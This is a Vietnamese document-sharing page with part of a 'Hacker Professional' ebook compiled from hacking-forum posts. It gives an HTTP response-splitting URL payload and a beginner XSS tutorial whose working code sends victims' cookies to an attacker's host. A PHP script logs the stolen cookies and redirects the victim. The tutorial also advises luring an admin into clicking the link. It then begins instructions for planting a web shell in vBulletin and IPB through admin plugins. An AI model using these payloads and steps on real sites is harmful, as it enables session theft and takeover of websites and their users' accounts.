1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 270 ppt

6 67 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 152,16 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Lục đống ebook thấy bài này khá hay , post lên cho các bạn tham khảo.. Định viết luôn nhưng vì sợ các bạn bảo ăn cắp bản quyền nên post nguyên văn một bài viết của tác giả huythanh Trích

Trang 1

</head>

<body>

HTTP /1.1 200 OK

Content-Type: text/html

Content-Length: 19

&lt;html&gt;Shazam&lt;/html&gt;

</body>

</html>

Nhìn kĩ code

QUOTE

%20 = spacebar

%0d%0a = xuống 2 dòng (skip 2 line)

Để tiện lợi hơn cho tấn công, xin giới thiệu một công cụ encode các kí tự trên URL http://horohoro.k7q1.com/HCE-URLencode.htm

WinDak

post Aug 25 2004, 04:38 PM

IP: Private | Post #6|

HCE-Group

Group Icon

Group: ** Tổng Tư Lệnh **

Posts: 14

Joined: 18-August 04

Trang 2

Member No.: 7

Warn: (0%) -+

Xin giải thích thêm:

Kĩ thuật web response này sử dụng để thay đổi tạm thời trang web khi được gửi đến client, nó gần giống XSS , nhưng XSS ta chỉ có thể chèn script vào để ăn cắp cookie, còn với kĩ thuật này ta có thể thay đổi hoàn toàn nội dung trang web này CODE

%0d%0aContent-

Length:%200%0d%0aHTTP%20/1.1%20200%20OK%0d%0aContent-Type:%20text/html%d%aContent-Length:%2019%d%a<html>Shazam</html>

Phần nằm trong <html></html> chính là website ta đã thay đổi, và khi victim click vào link

CODE

http://x.x.x.x/by_lang.jsp=English%0d%0aContent-

Length:%200%0d%0aHTTP%20/1.1%20200%20OK%0d%0aContent-Type:%20text/html%d%aContent-Length:%2019%d%a<html>Shazam</html>

nội dung victim nhìn thấy chỉ là đoạn trong <html></html>

Không biết tôi nói thế có chính xác không hả horo ^^

v

XSS căn bản

Lâu không post bài nào , toàn chat chit spam vớ vẩn Lục đống ebook thấy bài này khá hay , post lên cho các bạn tham khảo Định viết luôn nhưng vì sợ các bạn bảo ăn cắp bản quyền nên post nguyên văn một bài viết của tác giả huythanh

Trích:

Ngày nay, trên Internet ko khó để thấy các bug mới về XSS huythanh thấy ngứa tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này Vì mới tìm hiểu

Trang 3

nên bài này hợp với newbie hơn Ai copy nhớ cái copyright hộ nhá

** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA Hix nhớ bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may

là in ra 1 bản rồi Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của mask, hix có mấy chỗ mò cả ngày mới ra Anyway, cho gởi lời cảm ơn đặc biệt đến Mask

Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm

CSS : Cascading Style Sheets

XSS : Cross-Site Scripting

*** Dấu hiệu nhận biết site mắc lỗi :

Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này

Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]

Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác

là siêu sao

*** Cách chèn script :

Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được ) Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá

Code:

javascript:alert(document.cookie)

Thấy gì nào ? Nó sẽ ra có dạng thế này

acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;};

session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1;

pass_hash=c561a5a3859a0df75f76d98ae67bc026

[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]

Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó

vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie

Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong

Trang 4

Code:

javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)

Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó

document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất

Nếu hiểu được tới đây thì chắc chẳng còn gì để nói Sau đây là cách exploit

*** Cách exploit :

Đầu tiên tạo file cookie.php thế này up lên host của bạn

PHP Code:

<?

/*XSS Exploit */

/*PHP Cookie Saver */

/*Copyright by huythanhv2, HCVTEAM.NET */

$f=fopen(" xss.txt","a");

$cook=$HTTP_GET_VARS["cookie"];

fputs($f,$cook.chr(13));

fclose($f);

header("location: http://DIACHIDEDUDO.DUDO");

?>

XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này

Code:

http://sitexss.com/index.php?act=[xss]

Chúng ta khai thác thế này:

Code:

http://sitexss.com/index.php?act=<script>location="http://hostcuaban.com/cookie php?cookie="+(document.cookie)

</script>

Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn

Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái

DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi )

Trang 5

*** Vài lưu ý :

Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ :

1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS

10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà )

2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn 3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái

đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade

nó lên location

Hi vọng các bạn có thể hiểu được vì bài viết khá chi tiết , chưa hiểu chỗ nào post lên đây Mod forum sẽ hướng dẫn cụ thể Đọc xong bài này chắc các bạn cũng hiểu được cách mà người ta sử dụng với html injection trong vbb vừa qua ( Tìm đọc thêm bài của navaro trong box này )

Posted by kecodoc(HCE)

Cách up shelll ở IPB, VBB !!!

Thấy bài này của longnhi post bên VN1 cũng hay, rất có ích cho newbie tham khảo, để tránh trường hợp các bạn cứ open topic hỏi các vấn đề này, nên tôi copy

nó về HcE

Anh em nào có cách up shell khác có thể post trong topic này luôn tks

==================================================

=========

upshell thì tùy theo khả năng của mỗi người thôi, cái này nói chung chung hơi khó nhưng mà đối với VBB hay IPB thì tớ có thể giúp (cái này tớ nói khi đã vào được admincp)

+VBB: thằng này upshell rất đơn giản vào phần add plugin của VBB add thêm plugin mới và trong plugin này chứa đoạn code include shell

Ex:include('link shell');

Chú ý là phải enable cái plugin trước và phải để cái plugin mới add ở chế độ

active

Trang 6

+IPB:Thằng này hiện tại tớ có 3 cách up shell

Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần

Ngày đăng: 04/07/2014, 12:20